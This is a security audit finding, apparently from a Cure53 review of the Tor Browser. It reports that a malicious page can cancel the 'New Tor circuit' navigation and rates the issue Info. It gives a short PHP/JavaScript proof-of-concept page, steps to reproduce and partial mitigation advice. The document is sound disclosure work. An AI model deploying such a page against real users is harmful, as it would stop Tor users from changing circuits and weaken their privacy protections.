TTP-02-002 WP1: Redirect prevents switching to new Tor Circuit (Info)
Description:
It was discovered that navigation initiated through the new Tor Circuit feature can be hijacked. This can be accomplished by redirecting the current website to a cached page immediately after the Tor Circuit switch starts. As a result, the attacker-initiated navigation occurs before the Tor Circuit's browser-initiated navigation and, subsequently, the next step is canceled.
An attacker could exploit this vulnerability to prevent users from switching circuits while browsing a malicious webpage. Although this prevents the user from changing their Tor Circuit, it was concluded that this does not pose any immediate security risk, and as such, the severity mark was appropriately set at Info.
PoC:
<?php header ("cache-control: max-age=604800") ; header ("Age: 100"); 2> <html> <script> let status = false; onbeforeunload = () => { status = true; } let timer = setInterval(() => { if (status) { status = false; clearInterval (timer); location.href = location.href; } }, 1); </script> </html>
Steps to reproduce:
- Open the Tor Browser and connect to it.
- Save the PoC above as a PHP file and serve it through a PHP server.
- Access the file a few times through the Tor Browser to make sure it gets cached by the browser.
- Click on the Tor Circuit button and then on the** New Tor circuit for this site** option.
- The page will quickly be reloaded but the Circuit will remain the same.
To mitigate this issue, Cure53 advises forcing the navigation initiated by the new Tor Circuit feature to be completed. Cancellation of a user-initiated navigation is ill-advised in this scenario. However, during the testing phase, the team was unable to pinpoint the specific code responsible for this issue. As a result, the mitigation advice provided is currently incomplete.